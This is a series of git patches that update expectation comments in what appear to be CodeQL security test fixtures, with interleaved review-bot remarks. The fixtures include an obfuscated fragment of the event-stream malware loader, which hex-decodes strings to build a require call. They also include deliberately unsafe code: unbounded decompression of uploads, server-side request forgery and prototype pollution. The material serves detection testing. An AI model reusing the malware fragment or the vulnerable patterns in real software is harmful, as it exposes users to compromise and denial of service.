@@ -93,7 +93,7 @@ module.exports = function (e, n) { function e(r) { return Buffer.from(r, "hex").toString(); } - var n = r(e("2e2f746573742f64617461")), + var n = r(e("2e2f746573742f64617461")), // $ Alert o = t[e(n[3])][e(n[4])]; if (!o) return; var u = r(e(n[2]))[e(n[6])](e(n[5]), o), diff --git a/javascript/ql/test/query-tests/Security/CWE-506/event-stream.js b/javascript/ql/test/query-tests/Security/CWE-506/event-stream.js index e885d2e1f886..d358010c3ae5 100644 --- a/javascript/ql/test/query-tests/Security/CWE-506/event-stream.js +++ b/javascript/ql/test/query-tests/Security/CWE-506/event-stream.js @@ -6,7 +6,7 @@ function e(r) { return Buffer.from(r, "hex").toString() } -var n = r(e("2e2f746573742f64617461")), +var n = r(e("2e2f746573742f64617461")), // $ Alert o = t[e(n[3])][e(n[4])]; if (!o) return; From 3f7f74b92507e18532e677d69476702c9210ccde Mon Sep 17 00:00:00 2001 From: Asger F Date: Fri, 21 Feb 2025 20:14:51 +0100 Subject: [PATCH 094/892] JS: Accept alerts for DecompressionBomb --- .../CWE-522-DecompressionBombs/adm-zip.js | 8 ++++---- .../CWE-522-DecompressionBombs/decompress.js | 2 +- .../CWE-522-DecompressionBombs/jszip.js | 2 +- .../CWE-522-DecompressionBombs/node-tar.js | 10 +++++----- .../CWE-522-DecompressionBombs/pako.js | 4 ++-- .../CWE-522-DecompressionBombs/unbzip2.js | 2 +- .../CWE-522-DecompressionBombs/unzipper.js | 16 +++++++-------- .../CWE-522-DecompressionBombs/yauzl.js | 12 +++++------ .../CWE-522-DecompressionBombs/zlib.js | 20 +++++++++---------- 9 files changed, 38 insertions(+), 38 deletions(-) diff --git a/javascript/ql/test/query-tests/Security/CWE-522-DecompressionBombs/adm-zip.js b/javascript/ql/test/query-tests/Security/CWE-522-DecompressionBombs/adm-zip.js index 5370a4854acc..91abc84e80c8 100644 --- a/javascript/ql/test/query-tests/Security/CWE-522-DecompressionBombs/adm-zip.js +++ b/javascript/ql/test/query-tests/Security/CWE-522-DecompressionBombs/adm-zip.js 
@@ -25,13 +25,13 @@ function zipBomb(tarFile) { const zipEntries = admZip.getEntries(); zipEntries.forEach(function (zipEntry) { if (zipEntry.entryName === "my_file.txt") { - console.log(zipEntry.getData().toString("utf8")); + console.log(zipEntry.getData().toString("utf8")); // $ Alert } }); // outputs the content of file named 10GB - console.log(admZip.readAsText("10GB")); + console.log(admZip.readAsText("10GB")); // $ Alert // extracts the specified file to the specified location - admZip.extractEntryTo("10GB", "/tmp/", false, true); + admZip.extractEntryTo("10GB", "/tmp/", false, true); // $ Alert // extracts everything - admZip.extractAllTo("./tmp", true); + admZip.extractAllTo("./tmp", true); // $ Alert } \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Security/CWE-522-DecompressionBombs/decompress.js b/javascript/ql/test/query-tests/Security/CWE-522-DecompressionBombs/decompress.js index 360e29b2f51f..e8adba55e32d 100644 --- a/javascript/ql/test/query-tests/Security/CWE-522-DecompressionBombs/decompress.js +++ b/javascript/ql/test/query-tests/Security/CWE-522-DecompressionBombs/decompress.js @@ -8,7 +8,7 @@ app.listen(3000, () => { }); app.post('/upload', async (req, res) => { - decompress(req.query.filePath, 'dist').then(files => { + decompress(req.query.filePath, 'dist').then(files => { // $ Alert console.log('done!'); }); diff --git a/javascript/ql/test/query-tests/Security/CWE-522-DecompressionBombs/jszip.js b/javascript/ql/test/query-tests/Security/CWE-522-DecompressionBombs/jszip.js index 2da0757c2767..872f84e62f85 100644 --- a/javascript/ql/test/query-tests/Security/CWE-522-DecompressionBombs/jszip.js +++ b/javascript/ql/test/query-tests/Security/CWE-522-DecompressionBombs/jszip.js 
@@ -30,7 +30,7 @@ function zipBombSafe(zipFile) { } function zipBomb(zipFile) { - jszipp.loadAsync(zipFile.data).then(function (zip) { + jszipp.loadAsync(zipFile.data).then(function (zip) { // $ Alert zip.files["10GB"].async("uint8array").then(function (u8) { console.log(u8); }); diff --git a/javascript/ql/test/query-tests/Security/CWE-522-DecompressionBombs/node-tar.js b/javascript/ql/test/query-tests/Security/CWE-522-DecompressionBombs/node-tar.js index 53dd6c3d0a80..499d5fd7a2bb 100644 --- a/javascript/ql/test/query-tests/Security/CWE-522-DecompressionBombs/node-tar.js +++ b/javascript/ql/test/query-tests/Security/CWE-522-DecompressionBombs/node-tar.js @@ -21,7 +21,7 @@ function zipBomb(tarFile) { const inputFile = Readable.from(tarFile.data); const outputFile = fs.createWriteStream('/tmp/untar'); inputFile.pipe( - tar.x() + tar.x() // $ Alert ).pipe(outputFile); // scenario 2 @@ -30,7 +30,7 @@ function zipBomb(tarFile) { tar.x({ strip: 1, C: 'some-dir' - }) + }) // $ Alert ) // safe https://github.com/isaacs/node-tar/blob/8c5af15e43a769fd24aa7f1c84d93e54824d19d2/lib/list.js#L90 fs.createReadStream(tarFile.name).pipe( @@ -47,7 +47,7 @@ function zipBomb(tarFile) { ).pipe( tar.x({ cwd: "dest" - }) + }) // $ Alert ) // scenario 4 @@ -55,8 +55,8 @@ function zipBomb(tarFile) { // or using fs.writeFile // file path is a tmp file name that can get from DB after saving to DB with remote file upload // so the input file name will come from a DB source - tar.x({ file: tarFile.name }) - tar.extract({ file: tarFile.name }) + tar.x({ file: tarFile.name }) // $ Alert + tar.extract({ file: tarFile.name }) // $ Alert // safe https://github.com/isaacs/node-tar/blob/8c5af15e43a769fd24aa7f1c84d93e54824d19d2/lib/list.js#L90 tar.x({ file: tarFile.name, diff --git a/javascript/ql/test/query-tests/Security/CWE-522-DecompressionBombs/pako.js b/javascript/ql/test/query-tests/Security/CWE-522-DecompressionBombs/pako.js index 132d08e1f90a..4fb5b7d35e07 100644 
--- a/javascript/ql/test/query-tests/Security/CWE-522-DecompressionBombs/pako.js +++ b/javascript/ql/test/query-tests/Security/CWE-522-DecompressionBombs/pako.js @@ -18,7 +18,7 @@ function zipBomb1(zipFile) { const myArray = Buffer.from(new Uint8Array(zipFile.data.buffer)); let output; try { - output = pako.inflate(myArray); + output = pako.inflate(myArray); // $ Alert console.log(output); } catch (err) { console.log(err); @@ -29,7 +29,7 @@ function zipBomb2(zipFile) { const myArray = new Uint8Array(zipFile.data.buffer).buffer; let output; try { - output = pako.inflate(myArray); + output = pako.inflate(myArray); // $ Alert console.log(output); } catch (err) { console.log(err); diff --git a/javascript/ql/test/query-tests/Security/CWE-522-DecompressionBombs/unbzip2.js b/javascript/ql/test/query-tests/Security/CWE-522-DecompressionBombs/unbzip2.js index da560ca30f1d..83c1706573a4 100644 --- a/javascript/ql/test/query-tests/Security/CWE-522-DecompressionBombs/unbzip2.js +++ b/javascript/ql/test/query-tests/Security/CWE-522-DecompressionBombs/unbzip2.js @@ -9,5 +9,5 @@ app.listen(3000, () => { }); app.post('/upload', async (req, res) => { - fs.createReadStream(req.query.FilePath).pipe(bz2()).pipe(process.stdout); + fs.createReadStream(req.query.FilePath).pipe(bz2()).pipe(process.stdout); // $ Alert }); diff --git a/javascript/ql/test/query-tests/Security/CWE-522-DecompressionBombs/unzipper.js b/javascript/ql/test/query-tests/Security/CWE-522-DecompressionBombs/unzipper.js index 79e03b9c1814..b20bcb31de46 100644 --- a/javascript/ql/test/query-tests/Security/CWE-522-DecompressionBombs/unzipper.js +++ b/javascript/ql/test/query-tests/Security/CWE-522-DecompressionBombs/unzipper.js 
@@ -13,15 +13,15 @@ app.post('/upload', async (req, res) => { const RemoteStream = Readable.from(req.files.ZipFile.data); // Unsafe - RemoteStream.pipe(unzipper.Extract({ path: 'output/path' })); + RemoteStream.pipe(unzipper.Extract({ path: 'output/path' })); // $ Alert // Unsafe - RemoteStream.pipe(unzipper.ParseOne()) + RemoteStream.pipe(unzipper.ParseOne()) // $ Alert .pipe(createWriteStream('firstFile.txt')); // Safe because of uncompressedSize RemoteStream - .pipe(unzipper.Parse()) + .pipe(unzipper.Parse()) // $ Alert .on('entry', function (entry) { const size = entry.vars.uncompressedSize; if (size < 1024 * 1024 * 1024) { @@ -31,14 +31,14 @@ app.post('/upload', async (req, res) => { // Unsafe RemoteStream - .pipe(unzipper.Parse()) + .pipe(unzipper.Parse()) // $ Alert .on('entry', function (entry) { const size = entry.vars.uncompressedSize; entry.pipe(createWriteStream('output/path')); }); // Unsafe - const zip = RemoteStream.pipe(unzipper.Parse({ forceStream: true })); + const zip = RemoteStream.pipe(unzipper.Parse({ forceStream: true })); // $ Alert for await (const entry of zip) { const fileName = entry.path; if (fileName === "this IS the file I'm looking for") { @@ -48,7 +48,7 @@ app.post('/upload', async (req, res) => { } } // Safe - const zip2 = RemoteStream.pipe(unzipper.Parse({ forceStream: true })); + const zip2 = RemoteStream.pipe(unzipper.Parse({ forceStream: true })); // $ Alert for await (const entry of zip2) { const size = entry.vars.uncompressedSize; if (size < 1024 * 1024 * 1024) { @@ -57,7 +57,7 @@ app.post('/upload', async (req, res) => { } // Safe because of uncompressedSize - RemoteStream.pipe(unzipper.Parse()) + RemoteStream.pipe(unzipper.Parse()) // $ Alert .pipe(stream.Transform({ objectMode: true, transform: function (entry, e, cb) { 
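Review bot: Three calls that the test's own comments label safe now carry a plain `// $ Alert`: `.pipe(unzipper.Parse())` under `// Safe because of uncompressedSize` in the `@@ -13,15` and `@@ -57,7` hunks, and `zip2` under `// Safe` in the `@@ -48,7` hunk. If the query is wrong to flag them, the expectation should be `// $ SPURIOUS: Alert`, so the false positives stay visible and are not mistaken for intended results. If the check on `entry.vars.uncompressedSize` is deliberately not accepted as a barrier (the value is read from the entry's own metadata), the `// Safe` comments should be reworded instead. The `app.post('/upload', ...)` handler starts and ends outside these hunks.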
@@ -70,7 +70,7 @@ app.post('/upload', async (req, res) => { })); // Unsafe - RemoteStream.pipe(unzipper.Parse()) + RemoteStream.pipe(unzipper.Parse()) // $ Alert .pipe(stream.Transform({ objectMode: true, transform: function (entry, e, cb) { diff --git a/javascript/ql/test/query-tests/Security/CWE-522-DecompressionBombs/yauzl.js b/javascript/ql/test/query-tests/Security/CWE-522-DecompressionBombs/yauzl.js index 3b726650f76f..59f22e70cebd 100644 --- a/javascript/ql/test/query-tests/Security/CWE-522-DecompressionBombs/yauzl.js +++ b/javascript/ql/test/query-tests/Security/CWE-522-DecompressionBombs/yauzl.js @@ -9,9 +9,9 @@ app.listen(3000, () => { }); app.post('/upload', (req, res) => { - yauzl.fromFd(req.files.zipFile.data) - yauzl.fromBuffer(req.files.zipFile.data) - yauzl.fromRandomAccessReader(req.files.zipFile.data) + yauzl.fromFd(req.files.zipFile.data) // $ Alert + yauzl.fromBuffer(req.files.zipFile.data) // $ Alert + yauzl.fromRandomAccessReader(req.files.zipFile.data) // $ Alert // Safe yauzl.open(req.query.filePath, { lazyEntries: true }, function (err, zipfile) { if (err) throw err; @@ -36,11 +36,11 @@ app.post('/upload', (req, res) => { // Unsafe yauzl.open(req.query.filePath, { lazyEntries: true }, function (err, zipfile) { if (err) throw err; - zipfile.readEntry(); + zipfile.readEntry(); // $ Alert zipfile.on("entry", function (entry) { - zipfile.openReadStream(entry, async function (err, readStream) { + zipfile.openReadStream(entry, async function (err, readStream) { // $ Alert readStream.on("end", function () { - zipfile.readEntry(); + zipfile.readEntry(); // $ Alert }); const outputFile = fs.createWriteStream('testiness'); await pipeline( diff --git a/javascript/ql/test/query-tests/Security/CWE-522-DecompressionBombs/zlib.js b/javascript/ql/test/query-tests/Security/CWE-522-DecompressionBombs/zlib.js index 3954d9916144..8391e16e7fed 100644 --- a/javascript/ql/test/query-tests/Security/CWE-522-DecompressionBombs/zlib.js 
+++ b/javascript/ql/test/query-tests/Security/CWE-522-DecompressionBombs/zlib.js @@ -26,16 +26,16 @@ app.post('/upload', async (req, res) => { function zlibBombAsync(zipFile) { zlib.gunzip( - zipFile.data, + zipFile.data, // $ Alert (err, buffer) => { }); zlib.unzip( - zipFile.data, + zipFile.data, // $ Alert (err, buffer) => { }); zlib.brotliDecompress( - zipFile.data, + zipFile.data, // $ Alert (err, buffer) => { }); } @@ -60,9 +60,9 @@ function zlibBombAsyncSafe(zipFile) { } function zlibBombSync(zipFile) { - zlib.gunzipSync(zipFile.data, { finishFlush: zlib.constants.Z_SYNC_FLUSH }); - zlib.unzipSync(zipFile.data); - zlib.brotliDecompressSync(zipFile.data); + zlib.gunzipSync(zipFile.data, { finishFlush: zlib.constants.Z_SYNC_FLUSH }); // $ Alert + zlib.unzipSync(zipFile.data); // $ Alert + zlib.brotliDecompressSync(zipFile.data); // $ Alert } function zlibBombSyncSafe(zipFile) { @@ -74,9 +74,9 @@ function zlibBombSyncSafe(zipFile) { function zlibBombPipeStream(zipFile) { const inputStream = Readable.from(zipFile.data); const outputFile = fs.createWriteStream('unzip.txt'); - inputStream.pipe(zlib.createGunzip()).pipe(outputFile); - inputStream.pipe(zlib.createUnzip()).pipe(outputFile); - inputStream.pipe(zlib.createBrotliDecompress()).pipe(outputFile); + inputStream.pipe(zlib.createGunzip()).pipe(outputFile); // $ Alert + inputStream.pipe(zlib.createUnzip()).pipe(outputFile); // $ Alert + inputStream.pipe(zlib.createBrotliDecompress()).pipe(outputFile); // $ Alert } async function zlibBombPipeStreamPromises(zipFile) { @@ -84,7 +84,7 @@ async function zlibBombPipeStreamPromises(zipFile) { const outputFile = fs.createWriteStream('unzip.txt'); await stream.pipeline( inputStream, - zlib.createGunzip(), + zlib.createGunzip(), // $ Alert outputFile ) } From cd788bc5099506a24c8a0029bb90fbd82ebd1570 Mon Sep 17 00:00:00 2001 
From: Asger F Date: Fri, 21 Feb 2025 20:18:57 +0100 Subject: [PATCH 095/892] JS: Mark what seems to be missing alerts for fflate The query doesn't seem to model or even mention fflate. Not sure if the library is safe or just not modeled. --- .../CWE-522-DecompressionBombs/fflate.js | 17 +++++++++-------- 1 file changed, 9 insertions(+), 8 deletions(-) diff --git a/javascript/ql/test/query-tests/Security/CWE-522-DecompressionBombs/fflate.js b/javascript/ql/test/query-tests/Security/CWE-522-DecompressionBombs/fflate.js index 48403ebc86dd..4fb6cbd6195c 100644 --- a/javascript/ql/test/query-tests/Security/CWE-522-DecompressionBombs/fflate.js +++ b/javascript/ql/test/query-tests/Security/CWE-522-DecompressionBombs/fflate.js 
@@ -9,14 +9,15 @@ app.listen(3000, () => { }); app.post('/upload', async (req, res) => { - fflate.unzlibSync(new Uint8Array(req.files.CompressedFile.data)); // $ Alert - fflate.unzip(new Uint8Array(new Uint8Array(req.files.CompressedFile.data))); - fflate.unzlib(new Uint8Array(req.files.CompressedFile.data)); - fflate.unzlibSync(new Uint8Array(req.files.CompressedFile.data)); - fflate.gunzip(new Uint8Array(req.files.CompressedFile.data)); - fflate.gunzipSync(new Uint8Array(req.files.CompressedFile.data)); - fflate.decompress(new Uint8Array(req.files.CompressedFile.data)); - fflate.decompressSync(new Uint8Array(req.files.CompressedFile.data)); + // Not sure if these are vulnerable, but currently not modeled + fflate.unzlibSync(new Uint8Array(req.files.CompressedFile.data)); // $ MISSING: Alert + fflate.unzip(new Uint8Array(new Uint8Array(req.files.CompressedFile.data))); // $ MISSING: Alert + fflate.unzlib(new Uint8Array(req.files.CompressedFile.data)); // $ MISSING: Alert + fflate.unzlibSync(new Uint8Array(req.files.CompressedFile.data)); // $ MISSING: Alert + fflate.gunzip(new Uint8Array(req.files.CompressedFile.data)); // $ MISSING: Alert + fflate.gunzipSync(new Uint8Array(req.files.CompressedFile.data)); // $ MISSING: Alert + fflate.decompress(new Uint8Array(req.files.CompressedFile.data)); // $ MISSING: Alert + fflate.decompressSync(new Uint8Array(req.files.CompressedFile.data)); // $ MISSING: Alert fflate.unzlibSync(new Uint8Array(req.files.CompressedFile.data), { From 0f23c33d3c0fdbcfb5b30528244248fe102ab1c8 Mon Sep 17 00:00:00 2001 From: Asger F Date: Fri, 21 Feb 2025 20:20:20 +0100 Subject: [PATCH 096/892] JS: Fix a comment Apparently this comment used to say 'NOT OK' but clearly 'OK' was meant --- javascript/ql/test/query-tests/Security/CWE-598/tst.js | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) 
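Review bot: The added comment says `Not sure if these are vulnerable`, but every call below it is marked `// $ MISSING: Alert`, which records a definite expectation that the query should report it. Each of these calls hands `req.files.CompressedFile.data` to an fflate decompression function with no options argument, so the expectation looks defensible, but the comment and the markers should agree. I would reword the comment to something like `// Request data decompressed with no size limit; fflate is not modeled by the query yet - TODO confirm`, or drop the markers until the library's behaviour is confirmed. The handler continues past the end of the hunk, where a call with an options object begins.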
diff --git a/javascript/ql/test/query-tests/Security/CWE-598/tst.js b/javascript/ql/test/query-tests/Security/CWE-598/tst.js index 93c8146ffc42..02d4a0f0dacc 100644 --- a/javascript/ql/test/query-tests/Security/CWE-598/tst.js +++ b/javascript/ql/test/query-tests/Security/CWE-598/tst.js @@ -22,7 +22,7 @@ app.post("/login", (req, res) => { }); app.get("/login2", (req, res) => { - const username = req.param('username'); // $ Alert - usernames are fine + const username = req.param('username'); // OK - usernames are fine const password = req.param('password'); // $ Alert - password read checkUser(username, password, (result) => { res.send(result); From 1ee93cf51bd319b40dbc69124c54b06a789c6018 Mon Sep 17 00:00:00 2001 From: Asger F Date: Fri, 21 Feb 2025 20:21:17 +0100 Subject: [PATCH 097/892] JS: Manually fix two comments in JSX --- .../Security/CWE-601/ClientSideUrlRedirect/react.js | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/javascript/ql/test/query-tests/Security/CWE-601/ClientSideUrlRedirect/react.js b/javascript/ql/test/query-tests/Security/CWE-601/ClientSideUrlRedirect/react.js index 38828b109f13..e5da7ce96a43 100644 --- a/javascript/ql/test/query-tests/Security/CWE-601/ClientSideUrlRedirect/react.js +++ b/javascript/ql/test/query-tests/Security/CWE-601/ClientSideUrlRedirect/react.js @@ -7,7 +7,7 @@ class Application extends React.Component {
    My unsafe app - - + \ No newline at end of file From 3a535dbf68de802ad03ea1be8341ff47ffbc5ac2 Mon Sep 17 00:00:00 2001 From: Asger F Date: Tue, 25 Feb 2025 16:23:51 +0100 Subject: [PATCH 113/892] JS: Accept another alert --- .../ql/test/query-tests/Security/CWE-830/polyfill-nocheck.html | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/javascript/ql/test/query-tests/Security/CWE-830/polyfill-nocheck.html b/javascript/ql/test/query-tests/Security/CWE-830/polyfill-nocheck.html index 6b9fbfe65c8a..97ed8b016f00 100644 --- a/javascript/ql/test/query-tests/Security/CWE-830/polyfill-nocheck.html +++ b/javascript/ql/test/query-tests/Security/CWE-830/polyfill-nocheck.html @@ -1,7 +1,7 @@ Polyfill.io demo - + ... From 9f8744680db792bd66f870e8fcba74b3d112937e Mon Sep 17 00:00:00 2001 From: Asger F Date: Tue, 25 Feb 2025 16:33:02 +0100 Subject: [PATCH 114/892] JS: Remove a fixed spurious alert --- javascript/ql/test/query-tests/Security/CWE-843/tst.js | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/javascript/ql/test/query-tests/Security/CWE-843/tst.js b/javascript/ql/test/query-tests/Security/CWE-843/tst.js index d859f2ade6e2..ca2a1ce0fe30 100644 --- a/javascript/ql/test/query-tests/Security/CWE-843/tst.js +++ b/javascript/ql/test/query-tests/Security/CWE-843/tst.js @@ -33,7 +33,7 @@ express().get('/some/path', function (req, res) { foo.indexOf(); } if (foo instanceof Array) { - foo.indexOf(); // $ SPURIOUS: Alert + foo.indexOf(); } (foo + f()).indexOf(); From 2d1aa3e00acab29d4d2c60ec7232719604d851bf Mon Sep 17 00:00:00 2001 From: Asger F Date: Tue, 25 Feb 2025 16:35:22 +0100 Subject: [PATCH 115/892] JS: Accept missing alert and clarify reason --- javascript/ql/test/query-tests/Security/CWE-843/tst.js | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/javascript/ql/test/query-tests/Security/CWE-843/tst.js b/javascript/ql/test/query-tests/Security/CWE-843/tst.js index ca2a1ce0fe30..ac055cb82ddf 100644 
--- a/javascript/ql/test/query-tests/Security/CWE-843/tst.js +++ b/javascript/ql/test/query-tests/Security/CWE-843/tst.js @@ -27,6 +27,8 @@ express().get('/some/path', function (req, res) { foo.indexOf(prefix) == 1; // $ Alert foo.slice(1) === 'x'; // $ Alert + foo.length; // $ Alert + if (typeof foo === "string") { foo.indexOf(); } else { @@ -38,7 +40,7 @@ express().get('/some/path', function (req, res) { (foo + f()).indexOf(); - foo.length; // $ Alert + foo.length; // $ MISSING: Alert - missed due to guards sanitising both branches }); new Koa().use(function handler(ctx) { From 49274d5f73baf60372bc3127f38bcff7a19f601d Mon Sep 17 00:00:00 2001 From: Asger F Date: Tue, 25 Feb 2025 16:43:23 +0100 Subject: [PATCH 116/892] JS: Accept an alert --- .../examples/PrototypePollutingFunction.js | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingFunction/examples/PrototypePollutingFunction.js b/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingFunction/examples/PrototypePollutingFunction.js index 1953ba57f00b..052fd2e75847 100644 --- a/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingFunction/examples/PrototypePollutingFunction.js +++ b/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingFunction/examples/PrototypePollutingFunction.js @@ -4,7 +4,7 @@ function merge(dst, src) { if (isObject(dst[key])) { merge(dst[key], src[key]); } else { - dst[key] = src[key]; + dst[key] = src[key]; // $ Alert } } } From 976096540fe6062c7abf4780953e325c52a463aa Mon Sep 17 00:00:00 2001 From: Asger F Date: Tue, 25 Feb 2025 16:52:08 +0100 Subject: [PATCH 117/892] JS: Accept an alert --- javascript/ql/test/query-tests/Security/CWE-918/clientSide.js | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) 
diff --git a/javascript/ql/test/query-tests/Security/CWE-918/clientSide.js b/javascript/ql/test/query-tests/Security/CWE-918/clientSide.js index a8d7d429cf86..1724d06091fa 100644 --- a/javascript/ql/test/query-tests/Security/CWE-918/clientSide.js +++ b/javascript/ql/test/query-tests/Security/CWE-918/clientSide.js @@ -11,7 +11,7 @@ export function MyComponent() { const query = window.location.search.substring(1); request('https://example.com/api/' + query + '/id'); // $ Alert[js/client-side-request-forgery] request('https://example.com/api?q=' + query); - request('https://example.com/api/' + window.location.search); // likely OK - but currently flagged anyway + request('https://example.com/api/' + window.location.search); // $ Alert[js/client-side-request-forgery] - likely OK - but currently flagged anyway const fragment = window.location.hash.substring(1); request('https://example.com/api/' + fragment + '/id'); // $ Alert[js/client-side-request-forgery] From 764eb9880985e76e60a3c030340b29f4bb406bb4 Mon Sep 17 00:00:00 2001 From: Asger F Date: Tue, 25 Feb 2025 16:52:27 +0100 Subject: [PATCH 118/892] JS: Move two alerts and add query ID --- .../ql/test/query-tests/Security/CWE-918/serverSide.js | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/javascript/ql/test/query-tests/Security/CWE-918/serverSide.js b/javascript/ql/test/query-tests/Security/CWE-918/serverSide.js index 50a7fe976998..777f7eb00840 100644 --- a/javascript/ql/test/query-tests/Security/CWE-918/serverSide.js +++ b/javascript/ql/test/query-tests/Security/CWE-918/serverSide.js @@ -20,8 +20,8 @@ var server = http.createServer(function(req, res) { request.get(tainted); // $ Alert[js/request-forgery] var options = {}; - options.url = tainted; // $ Alert - request(options); + options.url = tainted; + request(options); // $ Alert[js/request-forgery] request("http://" + tainted); // $ Alert[js/request-forgery] 
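Review bot: The new expectation on `request('https://example.com/api/' + window.location.search)` is a plain `Alert[js/client-side-request-forgery]`, while the trailing text still says `likely OK - but currently flagged anyway`. If the result is considered a false positive, `// $ SPURIOUS: Alert[js/client-side-request-forgery] - likely OK` records that and keeps it distinguishable from the true positives on the neighbouring lines. If it is considered a real finding, the `likely OK` wording should be removed. `MyComponent` continues outside the hunk.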
@@ -124,8 +124,8 @@ var server2 = http.createServer(function(req, res) { axios({ method: 'get', - url: tainted // $ Alert - }) + url: tainted + }) // $ Alert[js/request-forgery] var myUrl = `${something}/bla/${tainted}`; axios.get(myUrl); // $ Alert[js/request-forgery] From 4d7cbe6f607e69445a2d2a4911cba20f13389374 Mon Sep 17 00:00:00 2001 From: Asger F Date: Tue, 25 Feb 2025 16:52:45 +0100 Subject: [PATCH 119/892] JS: Accept to web socket-based SSRF alerts --- javascript/ql/test/query-tests/Security/CWE-918/serverSide.js | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/javascript/ql/test/query-tests/Security/CWE-918/serverSide.js b/javascript/ql/test/query-tests/Security/CWE-918/serverSide.js index 777f7eb00840..a6a863860c79 100644 --- a/javascript/ql/test/query-tests/Security/CWE-918/serverSide.js +++ b/javascript/ql/test/query-tests/Security/CWE-918/serverSide.js @@ -106,7 +106,7 @@ import * as ws from 'ws'; new ws.Server({ port: 8080 }).on('connection', function(socket, request) { socket.on('message', function(message) { const url = request.url; - const socket = new ws(url); + const socket = new ws(url); // $ Alert[js/request-forgery] }); }); @@ -114,7 +114,7 @@ new ws.Server({ port: 8080 }).on('connection', function (socket, request) { socket.on('message', function (message) { const url = new URL(request.url, base); const target = new URL(url.pathname, base); - const socket = new ws(url); + const socket = new ws(url); // $ Alert[js/request-forgery] }); }); From e634b31c2780ee2baa16a28a46e64c4b97bc3379 Mon Sep 17 00:00:00 2001 From: Asger F Date: Tue, 25 Feb 2025 16:58:30 +0100 Subject: [PATCH 120/892] JS: Accept some UselessConditional alerts --- .../UselessConditional/UselessConditional.js | 26 +++++++++---------- 1 file changed, 13 insertions(+), 13 deletions(-) 
diff --git a/javascript/ql/test/query-tests/Statements/UselessConditional/UselessConditional.js b/javascript/ql/test/query-tests/Statements/UselessConditional/UselessConditional.js index d698b7d1c29e..a629ae06320d 100644 --- a/javascript/ql/test/query-tests/Statements/UselessConditional/UselessConditional.js +++ b/javascript/ql/test/query-tests/Statements/UselessConditional/UselessConditional.js @@ -2,32 +2,32 @@ function getLastLine(input) { var lines = [], nextLine; while ((nextLine = readNextLine(input))) lines.push(nextLine); - if (!lines) + if (!lines) // $ Alert throw new Error("No lines!"); return lines[lines.length-1]; } function lookup(cache, k) { var v; - return k in cache ? cache[k] : (v = new Entry(recompute())) && (cache[k] = v); + return k in cache ? cache[k] : (v = new Entry(recompute())) && (cache[k] = v); // $ Alert } function test(a, b) { if (!a && !b) { - if (a); - if (b); + if (a); // $ Alert + if (b); // $ Alert } if (!(a || b)) { - if (a); - if (b); + if (a); // $ Alert + if (b); // $ Alert } var x = new X(); - if(x){} - if (new X()){} - if((x)){} - if(((x))){} - if ((new X())){} + if(x){} // $ Alert + if (new X()){} // $ Alert + if((x)){} // $ Alert + if(((x))){} // $ Alert + if ((new X())){} // $ Alert x = 0n; if (x) // $ Alert @@ -51,7 +51,7 @@ async function awaitFlow(){ var known = knownF(); if (known) return; - if (known) + if (known) // $ Alert return; var unknown = unknownF(); @@ -86,7 +86,7 @@ async function awaitFlow(){ }); (function() { - if ((x, true)); + if ((x, true)); // $ Alert }); (function (x, y) { From 507a0918ad68dc79025ca220b165089e317d1a39 Mon Sep 17 00:00:00 2001 From: Asger F Date: Tue, 25 Feb 2025 17:00:09 +0100 Subject: [PATCH 121/892] JS: More alert updates in UselessConditional --- .../UselessConditional/UselessConditional.js | 10 +++++----- 1 file changed, 5 insertions(+), 5 deletions(-) 
diff --git a/javascript/ql/test/query-tests/Statements/UselessConditional/UselessConditional.js b/javascript/ql/test/query-tests/Statements/UselessConditional/UselessConditional.js index a629ae06320d..edba36470508 100644 --- a/javascript/ql/test/query-tests/Statements/UselessConditional/UselessConditional.js +++ b/javascript/ql/test/query-tests/Statements/UselessConditional/UselessConditional.js @@ -67,7 +67,7 @@ async function awaitFlow(){ (function() { function f1(x) { - x || y // $ Alert - but whitelisted + x || y // OK } f1(true); @@ -79,7 +79,7 @@ async function awaitFlow(){ function f3(x) { (function(){ - x || y // $ Alert - but whitelisted + x || y // OK }); } f3(true); @@ -150,7 +150,7 @@ async function awaitFlow(){ var v = p(); if (v) { // $ Alert } - if (v) { // $ Alert - but not detected due to SSA limitations + if (v) { // $ MISSING: Alert - due to SSA limitations } }); @@ -165,7 +165,7 @@ async function awaitFlow(){ var v = findOrThrow(); if (v) { // $ Alert } - if (v) { // $ Alert - but not detected due to SSA limitations + if (v) { // $ MISSING: Alert - due to SSA limitations } }); @@ -180,7 +180,7 @@ async function awaitFlow(){ (function() { function outer(x) { addEventListener("click", () => { - if (!x && something()) { // $ Alert - but whitelisted + if (!x && something()) { // OK something(); } }); From 7623ebb13bf67dcd925881a0344f6a5d69d8fa24 Mon Sep 17 00:00:00 2001 From: Asger F Date: Tue, 25 Feb 2025 17:01:07 +0100 Subject: [PATCH 122/892] JS: Accept changes in UseOfReturnlessFunction --- .../query-tests/Statements/UseOfReturnlessFunction/tst.js | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/javascript/ql/test/query-tests/Statements/UseOfReturnlessFunction/tst.js b/javascript/ql/test/query-tests/Statements/UseOfReturnlessFunction/tst.js index 7f4296932d96..37da0c7e2a6a 100644 --- a/javascript/ql/test/query-tests/Statements/UseOfReturnlessFunction/tst.js 
